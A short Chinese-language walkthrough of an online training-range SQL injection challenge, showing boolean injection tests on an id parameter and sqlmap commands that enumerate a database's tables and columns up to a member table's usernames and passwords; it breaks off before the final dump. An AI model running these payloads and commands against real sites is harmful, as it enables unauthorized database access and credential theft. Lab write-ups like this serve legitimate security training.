前言
本题为墨者学院在线靶场
进入题目发现是个登录界面,找了好久,最后在关于平台停机维护的通知的页面找到了注入点
判断注入类型,当输入?id=1’ and 1=1 %23时,页面显示正常。
?id=1' and 1=1 %23
当输入?id=1’ and 1=2 %23时,页面显示不正常。
由此判断注入类型为单字符注入。
一、sqlmap
首先先清理sqlmap的缓存。
python sqlmap.py --purge
查库名,得到库名为stormgroup
python sqlmap.py -u "http://219.153.49.228:44807/new_list.php?id=1" --dbs --batch
查表名,得到表名为member notice
python sqlmap.py -u "http://219.153.49.228:44807/new_list.php?id=1" -D "stormgroup" --dbs --tables --batch
查字段名,得到字段名为name password status
python sqlmap.py -u "http://219.153.49.228:44807/new_list.php?id=1" -D "stormgroup" -T "member" --dbs --columns --batch
最后查用户名和密码